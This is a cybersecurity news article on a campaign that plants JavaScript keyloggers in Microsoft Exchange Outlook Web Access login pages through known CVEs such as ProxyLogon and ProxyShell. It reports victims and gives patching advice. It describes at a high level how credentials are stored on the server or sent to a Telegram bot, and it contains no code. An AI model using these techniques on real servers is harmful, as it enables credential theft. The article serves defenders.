Hackers are exploiting vulnerable Microsoft Exchange servers with stealthy keyloggers to steal login credentials, compromising over 70 systems in at least 26 countries.
Cybersecurity researchers from Positive Technologies have discovered an ongoing wave of attacks targeting publicly exposed Microsoft Exchange servers. These servers are being infected with malicious JavaScript-based keyloggers that capture usernames and passwords when users log into Microsoft Outlook Web Access (OWA).
This new research builds upon a campaign first identified in May 2024, which initially focused on organizations in Africa and the Middle East. The number of confirmed victims has now grown to at least 65 organizations, with more than 70 Exchange servers compromised globally.
According to the report, hackers are exploiting known vulnerabilities in Microsoft Exchange Server to inject JavaScript code directly into the Outlook login page. The purpose of this code is to act as a keylogger — software that secretly records what users type into a form.
Positive Technologies identified two main variants of the JavaScript keyloggers:
Local File-Based Keylogger: This version captures the user’s login data and stores it in a file on the infected server. That file can then be accessed remotely by the attacker.
Remote Exfiltration via Telegram: This version sends the stolen data in real-time to a Telegram bot, using HTTP requests with credentials hidden in the headers.
Some variants also collect extra details such as browser cookies, User-Agent information, and timestamps. These additional data points help attackers mimic real user behavior and avoid detection.
The attackers are taking advantage of several well-known security flaws in Microsoft Exchange and Windows Server, including:
CVE-2014-4078 – IIS Security Feature Bypass
CVE-2020-0796 – SMBv3 Remote Code Execution (SMBGhost)
CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065 – ProxyLogon Exploits
CVE-2021-31206, CVE-2021-31207
CVE-2021-34473, CVE-2021-34523 – ProxyShell Exploits
These vulnerabilities have been patched by Microsoft in recent years, but many organizations continue to run unpatched Exchange servers exposed to the internet, leaving them vulnerable.
One of the reasons this campaign is particularly dangerous is its stealthy nature. In the local file version, the stolen credentials are written to a file directly on the server — no outbound traffic is required. This makes it very hard for security monitoring tools to detect the attack, especially since the JavaScript runs inside the normal login page.
In the Telegram-based version, the credentials are encoded and sent using GET requests, disguising them as regular web traffic. The attacker uses Telegram’s bot API to receive stolen usernames and passwords instantly.
Some attacks also involve DNS tunneling combined with HTTPS POST requests, which allow hackers to bypass traditional firewalls and security tools by blending in with normal DNS or HTTPS traffic.
So far, 22 of the compromised servers were found in government organizations. Others include:
IT service providers
Educational institutions
Industrial and manufacturing companies
Logistics and supply chain firms
The top targeted countries include:
Vietnam
Russia
Taiwan
China
Pakistan
Lebanon
Australia
Zambia
The Netherlands
Turkey
Researchers suspect that the attackers are selectively choosing victims based on geography and industry, possibly for espionage or financial gain.
The continued success of these attacks highlights a critical issue in enterprise cybersecurity — many Microsoft Exchange servers around the world are still unpatched and exposed to the internet.
“By embedding malicious code into legitimate authentication pages, attackers are able to stay undetected for long periods while capturing user credentials in plaintext,” the researchers said.
This type of attack is not only dangerous but also difficult to detect and remediate, especially since the malicious code resides in trusted web applications that administrators and users rely on daily.
To protect against these kinds of attacks, organizations should:
Immediately patch known Exchange vulnerabilities, especially ProxyLogon and ProxyShell.
Remove public access to Exchange login pages wherever possible.
Monitor web login pages for unauthorized script modifications.
Enable multi-factor authentication (MFA) to reduce the impact of credential theft.
Conduct regular security audits on web-facing systems and file logs.
These keylogger attacks on Microsoft Exchange servers are a wake-up call for organizations still running legacy or unpatched infrastructure. With attackers increasingly embedding malicious code into trusted systems, traditional defenses like firewalls and antivirus are no longer enough.
Cybersecurity hygiene, patch management, and proactive threat detection are now more essential than ever to defend against stealthy, persistent threats like this one.
Interesting Article : U.S. on High Alert: Pro-Iranian Hackers Likely to Strike American Networks
Pingback: Citrix Patches Critical CVE-2025-6543 Bug in NetScaler ADC Under Active Exploitation